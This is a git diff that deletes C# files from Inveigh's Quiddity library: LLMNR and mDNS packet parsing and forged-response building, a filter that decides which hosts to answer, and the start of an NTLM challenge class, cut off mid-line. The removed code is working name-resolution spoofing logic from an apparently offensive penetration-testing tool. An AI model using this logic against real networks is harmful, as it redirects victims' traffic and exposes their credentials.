source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.DNS; - -namespace Quiddity.LLMNR -{ - class LLMNRChecker : DNSChecker - { - - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/LLMNR/LLMNRHeader.cs b/Inveigh/Protocols/Quiddity/Protocols/LLMNR/LLMNRHeader.cs deleted file mode 100644 index 8df7faa..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/LLMNR/LLMNRHeader.cs +++ /dev/null @@ -1,130 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.DNS; -using System; - -namespace Quiddity.LLMNR -{ - class LLMNRHeader : DNSHeader - { - // https://tools.ietf.org/html/rfc4795#section-2.1 - - public bool C { get; set; } // 1 bit - public bool T { get; set; } // 1 bit - - public LLMNRHeader() - { - - } - - public LLMNRHeader (byte[] data) - { - ReadBytes(data, 0); - } - - public byte[] GetPacket(uint ttl, string ip, string ipv6, byte[] data, out string name, out string type) - { - this.ReadBytes(data, 0); - name = ""; - type = "A"; - - if (!this.QR) - { - LLMNRQuestion question = new LLMNRQuestion(); - question.ReadBytes(data, 12); - - if (string.Equals(BitConverter.ToString(question.QType), "00-1C")) - { - type = "AAAA"; - ip = ipv6; - } - - LLMNRResource response = new LLMNRResource(); - return response.GetBytes(question, ttl, ip, this.ID); - } - - return null; - } - - - protected override void ReadFlags() - { - string flags = Convert.ToString(BitConverter.ToUInt16(this.Flags, 0), 2).PadLeft(16, '0'); - - if (string.Equals(flags.Substring(0, 1), "1")) - { - this.QR = true; - } - - this.Opcode = flags.Substring(1, 4); - - if (string.Equals(flags.Substring(5, 1), "1")) - { - this.C = true; - } - - if (string.Equals(flags.Substring(6, 1), "1")) - { - this.TC = true; - } - - if (string.Equals(flags.Substring(7, 1), "1")) - { - this.T = true; - } - - this.Z = flags.Substring(8, 4); - this.RCode = flags.Substring(12, 4); - } - - protected override void WriteFlags() - { - string flags = this.QR ? "1" : "0"; - flags += this.Opcode; - flags += this.C ? "1" : "0"; - flags += this.TC ? "1" : "0"; - flags += this.T ? "1" : "0"; - flags += this.Z; - flags += this.RCode; - byte[] bytes = new byte[2]; - - for (int i = 0; i < 2; ++i) - { - bytes[i] = Convert.ToByte(flags.Substring(8 * i, 8), 2); - } - - this.Flags = bytes; - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/LLMNR/LLMNRPacket.cs b/Inveigh/Protocols/Quiddity/Protocols/LLMNR/LLMNRPacket.cs deleted file mode 100644 index c424a82..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/LLMNR/LLMNRPacket.cs +++ /dev/null @@ -1,98 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.LLMNR; -using Quiddity.Support; -using System; -using System.Collections.Generic; -using System.Linq; -using System.Net; -using System.Text; - -namespace Quiddity.LLMNR -{ - class LLMNRPacket - { - public LLMNRHeader Header { get; set; } - public LLMNRQuestion Question { get; set; } - public LLMNRResource Resource { get; set; } - - public LLMNRPacket(byte[] data) - { - ReadBytes(data); - } - - public LLMNRPacket ReadBytes(byte[] data) - { - this.Header = new LLMNRHeader(data); - this.Question = new LLMNRQuestion(data); - return this; - } - - public byte[] GetBytes(uint ttl, string replyIP, string replyIPv6) - { - - if (string.Equals(this.Question.Type, "AAAA") && !String.IsNullOrEmpty(replyIPv6)) - { - replyIP = replyIPv6; - } - - byte[] rdata = IPAddress.Parse(replyIP).GetAddressBytes(); - - this.Header = new LLMNRHeader - { - ID = this.Header.ID, - QR = true, - Opcode = "0000", - C = false, - TC = false, - T = false, - Z = "0000", - RCode = "0000", - QDCount = 1, - ANCount = 1 - }; - - this.Resource = new LLMNRResource - { - Name = this.Question.QName, - Type = this.Question.QType, - Class = this.Question.QClass, - TTL = ttl, - RDLength = (ushort)rdata.Length, - RData = rdata - }; - - return Utilities.BlockCopy(this.Header.GetBytes(), this.Question.GetBytes(), this.Resource.GetBytes()); - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/LLMNR/LLMNRQuestion.cs b/Inveigh/Protocols/Quiddity/Protocols/LLMNR/LLMNRQuestion.cs deleted file mode 100644 index 7c8fd9e..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/LLMNR/LLMNRQuestion.cs +++ /dev/null @@ -1,53 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; -using Quiddity.DNS; - -namespace Quiddity.LLMNR -{ - class LLMNRQuestion : DNSQuestion - { - public LLMNRQuestion() - { - - } - - public LLMNRQuestion(byte[] data) - { - ReadBytes(data, 12); - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/LLMNR/LLMNRResource.cs b/Inveigh/Protocols/Quiddity/Protocols/LLMNR/LLMNRResource.cs deleted file mode 100644 index e4f090e..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/LLMNR/LLMNRResource.cs +++ /dev/null @@ -1,74 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Net; -using System.Text; -using Quiddity.DNS; -using Quiddity.Support; - -namespace Quiddity.LLMNR -{ - class LLMNRResource : DNSResource - { - public byte[] GetBytes(LLMNRQuestion llmnrQuestion, uint TTL, string responseData, byte[] id) - { - byte[] rdata = IPAddress.Parse(responseData).GetAddressBytes(); - - LLMNRHeader responseHeader = new LLMNRHeader - { - ID = id, - QR = true, - Opcode = "0000", - C = false, - TC = false, - T = false, - Z = "0000", - RCode = "0000", - QDCount = 1, - ANCount = 1 - }; - - this.Name = llmnrQuestion.QName; - this.Type = llmnrQuestion.QType; - this.Class = llmnrQuestion.QClass; - this.TTL = TTL; - this.RDLength = (ushort)rdata.Length; - this.RData = rdata; - - return Utilities.BlockCopy(responseHeader.GetBytes(), llmnrQuestion.GetBytes(), this.GetBytes()); - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/MDNS/MDNSChecker.cs b/Inveigh/Protocols/Quiddity/Protocols/MDNS/MDNSChecker.cs deleted file mode 100644 index 729adca..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/MDNS/MDNSChecker.cs +++ /dev/null @@ -1,84 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.DNS; -using Quiddity.Support; -using System; - -namespace Quiddity.MDNS -{ - class MDNSChecker : DNSChecker - { - public string[] Questions { get; set; } - public string OutputQuestionDenied { get; set; } - - public MDNSChecker() - { - this.OutputReplyAllowed = "response sent"; - this.OutputInspect = "inspect only"; - this.OutputDisabled = "disabled"; - this.OutputHostDenied = "host ignored"; - this.OutputIPDenied = "IP ignored"; - this.OutputTypeDenied = "type ignored"; - this.OutputServiceDenied = "service ignored"; - this.OutputRepeat = "previous capture"; - this.OutputQuestionDenied = "question type ignored"; - } - - public virtual bool Check(string name, string question, string type, string clientIP) - { - - if (!Check(name, type, clientIP)) - { - return false; - } - else if (!QuestionIsAllowed(question)) - { - this.OutputMessage = this.OutputQuestionDenied; - return false; - } - - return true; - } - - public bool QuestionIsAllowed(string question) - { - - if (!Utilities.ArrayIsNullOrEmpty(this.Questions) && !Array.Exists(this.Questions, element => element == question.ToUpper())) - { - return false; - } - - return true; - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/MDNS/MDNSHeader.cs b/Inveigh/Protocols/Quiddity/Protocols/MDNS/MDNSHeader.cs deleted file mode 100644 index 2647e59..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/MDNS/MDNSHeader.cs +++ /dev/null @@ -1,124 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; -using Quiddity.DNS; - -namespace Quiddity.MDNS -{ - class MDNSHeader : DNSHeader - { - public bool AD { get; set; } // 1 bit - public bool CD { get; set; } // 1 bit - - public MDNSHeader() - { - - } - - public MDNSHeader(byte[] data) - { - ReadBytes(data, 0); - } - - protected override void ReadFlags() - { - string flags = Convert.ToString(BitConverter.ToUInt16(this.Flags, 0), 2).PadLeft(16, '0'); - - if (string.Equals(flags.Substring(0, 1), "1")) - { - this.QR = true; - } - - this.Opcode = flags.Substring(1, 4); - - if (string.Equals(flags.Substring(5, 1), "1")) - { - this.AA = true; - } - - if (string.Equals(flags.Substring(6, 1), "1")) - { - this.TC = true; - } - - if (string.Equals(flags.Substring(7, 1), "1")) - { - this.RD = true; - } - - if (string.Equals(flags.Substring(8, 1), "1")) - { - this.RA = true; - } - - this.Z = flags.Substring(9, 1); - - if (string.Equals(flags.Substring(10, 1), "1")) - { - this.AD = true; - } - - if (string.Equals(flags.Substring(11, 1), "1")) - { - this.CD = true; - } - - this.RCode = flags.Substring(12, 4); - } - - protected override void WriteFlags() - { - string flags = this.QR ? "1" : "0"; - flags += this.Opcode; - flags += this.AA ? "1" : "0"; - flags += this.TC ? "1" : "0"; - flags += this.RD ? "1" : "0"; - flags += this.RA ? "1" : "0"; - flags += this.Z; - flags += this.AD ? "1" : "0"; - flags += this.CD ? "1" : "0"; - flags += this.RCode; - byte[] bytes = new byte[2]; - - for (int i = 0; i < 2; ++i) - { - bytes[i] = Convert.ToByte(flags.Substring(8 * i, 8), 2); - } - - this.Flags = bytes; - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/MDNS/MDNSPacket.cs b/Inveigh/Protocols/Quiddity/Protocols/MDNS/MDNSPacket.cs deleted file mode 100644 index 003a629..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/MDNS/MDNSPacket.cs +++ /dev/null @@ -1,99 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.Support; -using System; -using System.Collections.Generic; -using System.Linq; -using System.Net; -using System.Text; - -namespace Quiddity.MDNS -{ - class MDNSPacket - { - public MDNSHeader Header { get; set; } - public MDNSQuestion Question { get; set; } - public MDNSResource Resource { get; set; } - public MDNSPacket(byte[] data) - { - ReadBytes(data); - } - - public MDNSPacket ReadBytes(byte[] data) - { - this.Header = new MDNSHeader(data); - this.Question = new MDNSQuestion(data); - return this; - } - - public byte[] GetBytes(uint ttl, string replyIP, string replyIPv6) - { - - if (string.Equals(this.Question.Type, "AAAA") && !String.IsNullOrEmpty(replyIPv6)) - { - replyIP = replyIPv6; - } - - byte[] rdata = IPAddress.Parse(replyIP).GetAddressBytes(); - - this.Header = new MDNSHeader - { - ID = this.Header.ID, - QR = true, - Opcode = "0000", - AA = true, - TC = false, - RD = false, - RA = false, - Z = "0", - AD = false, - CD = false, - RCode = "0000", - QDCount = 1, - ANCount = 1 - }; - - this.Resource = new MDNSResource - { - Name = this.Question.QName, - Type = this.Question.QType, - Class = this.Question.QClass, - TTL = ttl, - RDLength = (ushort)rdata.Length, - RData = rdata - }; - - return Utilities.BlockCopy(this.Header.GetBytes(), this.Question.GetBytes(), this.Resource.GetBytes()); - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/MDNS/MDNSQuestion.cs b/Inveigh/Protocols/Quiddity/Protocols/MDNS/MDNSQuestion.cs deleted file mode 100644 index e3b224a..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/MDNS/MDNSQuestion.cs +++ /dev/null @@ -1,63 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.DNS; -using System; - -namespace Quiddity.MDNS -{ - class MDNSQuestion : DNSQuestion - { - public string QuestionType { get; set; } - - public MDNSQuestion() - { - - } - - public MDNSQuestion(byte[] data) - { - ReadBytes(data, 12); - string qclass = Convert.ToString(BitConverter.ToUInt16(this.QClass, 0), 2).PadLeft(16, '0'); - - if (qclass.StartsWith("1")) - { - this.QuestionType = "QU"; - } - else - { - this.QuestionType = "QM"; - } - - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/MDNS/MDNSResource.cs b/Inveigh/Protocols/Quiddity/Protocols/MDNS/MDNSResource.cs deleted file mode 100644 index c24079a..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/MDNS/MDNSResource.cs +++ /dev/null @@ -1,39 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.DNS; - -namespace Quiddity.MDNS -{ - class MDNSResource : DNSResource - { - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/NTLM/NTLMChallenge.cs b/Inveigh/Protocols/Quiddity/Protocols/NTLM/NTLMChallenge.cs deleted file mode 100644 index d0ec6f9..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/NTLM/NTLMChallenge.cs +++ /dev/null @@ -1,275 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Text; -using System.IO; -using Quiddity.Support; -using Quiddity.SPNEGO; - -namespace Quiddity.NTLM -{ - class NTLMChallenge - { - //https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/801a4681-8809-4be9-ab0d-61dcfe762786 - public byte[] Signature { get; set; } - public uint MessageType { get; set; } - public ushort TargetNameLen { get; 